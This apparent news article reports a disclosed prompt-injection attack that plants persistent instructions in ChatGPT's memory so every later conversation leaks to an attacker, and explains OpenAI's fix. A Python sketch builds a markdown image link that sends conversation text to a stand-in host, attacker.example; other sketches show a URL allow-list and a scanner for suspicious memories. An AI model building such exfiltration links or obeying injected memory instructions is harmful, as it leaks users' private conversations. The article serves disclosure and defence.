Hacker creates fake memories in ChatGPT to steal victim data – but it may not be as bad as it sounds
Security researchers have disclosed a vulnerability that could allow attackers to plant malicious instructions in a user’s saved memories in the ChatGPT macOS app.
A report by Johann Rehberger at Embrace The Red showed how an attacker could use a prompt injection to take control of ChatGPT and plant a malicious instruction in its long-term memory storage and persistence mechanism. This causes both sides of the conversation to be exfiltrated directly to the attacker’s server.
Because the injected prompt persists in memory, all future conversations with the chatbot remain compromised. Since ChatGPT remembers things about its users, such as names, ages, locations, likes and dislikes, and previous searches, this exploit poses a serious risk.
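To make the mechanism concrete, here is a minimal Python sketch of the kind of exfiltration channel Rehberger described: an injected memory tells ChatGPT to append a markdown image whose URL smuggles the conversation to an attacker-controlled server. The server address and helper function here are hypothetical, for illustration only.

```python
from urllib.parse import quote

# Hypothetical attacker endpoint, for illustration only.
ATTACKER_SERVER = "https://attacker.example/log"

def exfiltration_markdown(conversation_text: str) -> str:
    """Build the sort of markdown image link an injected memory could
    instruct ChatGPT to append to every reply. When the client renders
    the 'image', the conversation leaks to the attacker's server as a
    URL query parameter, with no click required."""
    return f"![]({ATTACKER_SERVER}?q={quote(conversation_text)})"

# A single user message smuggled out inside an image request:
print(exfiltration_markdown("user: my address is 123 Main St"))
# ![](https://attacker.example/log?q=user%3A%20my%20address%20is%20123%20Main%20St)
```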
Stay safe
In response, OpenAI introduced an API call that blocks the exploit via ChatGPT’s web interface, and also released a fix to prevent memories from being used as an exfiltration vector. However, researchers say that untrusted third-party content can still inject prompts that abuse the memory tool.
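OpenAI has not published the internals of its fix, but one plausible shape for it is a URL-safety check that stops the client from fetching images on unknown hosts. The sketch below is an assumption for illustration: the function name, allow-list, and logic are ours, not OpenAI’s actual implementation.

```python
import re

# Illustrative allow-list of trusted hosts; the entries and the check
# itself are assumptions, not OpenAI's real code.
TRUSTED_HOSTS = {"openai.com", "oaiusercontent.com"}

def is_url_safe(url: str) -> bool:
    """Return True only for URLs on an explicitly trusted host, so an
    injected image link pointing at an unknown server is never fetched."""
    match = re.match(r"https?://([^/?#]+)", url)
    if not match:
        return False
    host = match.group(1).lower()
    return any(host == h or host.endswith("." + h) for h in TRUSTED_HOSTS)

print(is_url_safe("https://cdn.openai.com/logo.png"))        # True
print(is_url_safe("https://attacker.example/log?q=secret"))  # False
```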
The memory tool is enabled by default in ChatGPT, but the good news is that users can turn it off. The feature is great for those who want a more personalized experience with the chatbot, as it can learn your wants and needs and make suggestions based on that information – but there are clear dangers.
To mitigate these risks, users should stay vigilant when using the chatbot and pay particular attention to ‘new memory added’ notifications. By regularly reviewing their saved memories, users can check for potentially planted ones.
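For anyone who wants more than an eyeball check, a small script can scan an exported copy of saved memories for red flags. This is a rough heuristic sketch: the file name and patterns are assumptions, and ChatGPT offers no official export API for memories, so the text must be copied out of the settings screen by hand.

```python
import re

# Rough heuristics for memories that deserve a second look; legitimate
# memories rarely contain URLs or standing instructions.
SUSPICIOUS = [
    re.compile(r"https?://", re.IGNORECASE),
    re.compile(r"\balways\b|\bevery (reply|response|message)\b", re.IGNORECASE),
    re.compile(r"\b(append|include|send|forward)\b", re.IGNORECASE),
]

def flag_memories(path: str = "my_memories.txt") -> None:
    """Print every saved-memory line that matches a suspicious pattern."""
    with open(path, encoding="utf-8") as f:
        for lineno, line in enumerate(f, start=1):
            if any(p.search(line) for p in SUSPICIOUS):
                print(f"line {lineno}: review this memory -> {line.strip()}")

if __name__ == "__main__":
    flag_memories()
```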
This isn’t the first vulnerability researchers have discovered in ChatGPT. Researchers previously raised concerns that ChatGPT plugins could allow attackers to take over other users’ accounts and potentially gain access to sensitive data.